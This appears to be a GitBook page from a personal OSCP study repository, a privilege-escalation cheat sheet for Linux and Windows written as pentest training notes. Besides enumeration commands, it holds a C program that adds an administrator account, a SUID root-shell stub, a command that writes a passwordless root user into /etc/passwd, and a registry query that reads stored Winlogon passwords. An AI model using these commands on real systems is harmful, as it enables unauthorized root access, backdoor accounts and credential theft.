OSCP
  • All About OSCP
  • OSCP- One Page Repository
  • About the Author
  • Basic Linux & Windows Commands
    • Linux Commands
    • Windows
      • cmd
      • Powershell
      • Basics of windows
    • Linux / WindowsMain commands
    • Bash Scripting
  • Recon (Scanning & Enumeration)
    • Active Info Gathering
      • My Network Recon Checklist
      • My Web Recon Checklist
      • Network Enumeration
      • Port Scanning
    • Common Ports and Services
      • Other Services Enumeration
    • DNS Zone Transfer Attack
    • SNMP Enumeration
    • SMB Enumeration
    • Web Application Directory bruteforcing / fingerprinting
    • Port & Services Scanning
  • Web Application
    • My checklist
      • LFI
      • RFI
      • SQLI
    • File Upload bypass
    • Enumeration and Exploitation
    • No-Sql Injection
    • SQL Injection
    • Hidden Files and directories
    • RFI
    • LFI
  • Brute Force
    • Reuse the hash
    • Password Crack
  • Shells
    • Linux Reverse Shell [One liner]
    • Reverse Shell to fully interactive
    • Reverse Shell Cheat Sheet
    • WebShell
  • Transferring files
    • My Checklist
    • Transfer files on linux
  • Priv Escalation
    • Linux Priv Escalation
      • g0tmi1k linux privilege escalation
      • Privilege Escalation - Linux
      • Checklist - Linux Privilege Escalation
    • Windows Priv Escalation
      • Fuzzysecurity window priv escalation
      • Privilege Escalation - Windows
      • Checklist - Local Windows Privilege Escalation
  • Post Exploitation
    • Cover your tracks
    • Persistence
    • Loot Linux
    • Loot Windows
    • Escaping Restricted Shell
    • Meterpreter shell for post-exploitation
    • Spawn Shell
  • Pivoting
    • My Checklist for Pivoting
    • Tunneling and Port Forwarding
    • Pivotind understanding
  • Buffer Overflow
    • Buffer overflow
    • Buffer overflow Step by Step
      • Study about buffer overflow
      • Brainpan
      • VulnServer
      • Minishare
  • Main Tools
  • MISC
    • Exploit Compiling
  • CheatSheet (Short)
  • OSCP/ Vulnhub Practice learning
    • Machines Practice
    • My Practice on HTB Windows boxes
    • My Practice on Vulnhub boxes
    • Over the Wire (Natas)
    • Over The wire (Bandit)
Powered by GitBook
On this page

Was this helpful?

Priv Escalation

PreviousTransfer files on linuxNextLinux Priv Escalation

Last updated 5 years ago

Was this helpful?

Privilege Escalation

Linux Privilege Escalation

  • sudo -l

  • Kernel Exploits

  • OS Exploits

  • Password reuse (mysql, .bash_history, 000-default.conf...)

  • Known binaries with suid flag and interactive (nmap)

  • Custom binaries with suid flag either using other binaries or with command execution

  • Writable files owned by root that get executed (cronjobs)

  • MySQL as root

  • Vulnerable services (chkrootkit, logrotate)

  • Writable /etc/passwd

  • Readable .bash_history

  • SSH private key

  • Listening ports on localhost

  • /etc/fstab

  • /etc/exports

  • /var/mail

  • Process as other user (root) executing something you have permissions to modify

  • SSH public key + Predictable PRNG

  • apt update hooking (Pre-Invoke)

  • Capabilities

Windows Privilege Escalation

  • Kernel Exploits

  • OS Exploits

  • Pass The Hash

  • Password reuse

  • DLL hijacking (Path)

  • Vulnerable services

  • Writable services binaries path

  • Unquoted services

  • Listening ports on localhost

  • Registry keys

Kernel Exploits

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
http://www.fuzzysecurity.com/tutorials/16.html

Windows Add User

#include <stdlib.h> /* system, NULL, EXIT_FAILURE */

int main ()
{
  int i;
  i=system ("net user <username> <password> /add && net localgroup administrators <username> /add");
  return 0;
}

SUID Change

SUID

Set owner user ID.

int main(void){
  setresuid(0, 0, 0);
  system("/bin/bash");
}

Privilege Escalation:
#Find Binaries that will execute as the owner
find / -perm -u=s -type f 2>/dev/null

#Find binaries that will execute as the group
find / -perm -g=s -type f 2>/dev/null

#Find sticky-bit binaries
find / -perm -1000 -type d 2>/dev/null

find / -perm -4000 2>/dev/null

writable by everyone
find / -writable -type f 2>/dev/null

World writeable directories
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root

World writeable files
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null

Writeable config files
find /etc/ -writable -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null

Window Exploit Suggester

python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
python windows-exploit-suggester.py –systeminfo systeminfo.txt –database 2018-11-25-mssb.xls

Windows Priv Escalation

AlwaysInstallElevated
Check if the following registry settings are set to "1"
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

Basic Linux Enumeration

Distribution type & kernel version
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux

Default writeable directory / folder
/tmp
/dev/shm

Search for passwords
Search for password within config.php
grep -R 'password' config.php

Find possible other writeable directory / folder
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;

Service(s) running as root user
ps aux | grep root
ps -ef | grep root

Installed applications
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archivesO
ls -lah /var/cache/yum/

Scheduled jobs
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab

Find pattern in file:
grep -rnw '/etc/passwd' -e 'root'

Sticky bit, SGID, SUID, GUID
Sticky bit
find / -perm -1000 -type d 2>/dev/null

SGID (chmod 2000)
find / -perm -g=s -type f 2>/dev/null

SUID (chmod 4000)
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null

SUID or GUID
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

Add user to /etc/passwd and root group
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd

Linux:

Windows:

https://payatu.com/guide-linux-privilege-escalation
https://github.com/lucyoa/kernel-exploits
https://github.com/abatchy17/WindowsExploits
GTFOBins
https://guif.re/linuxeopguif.re
Logo
https://guif.re/windowseopguif.re
FuzzySecurity | Windows Privilege Escalation Fundamentals
Logo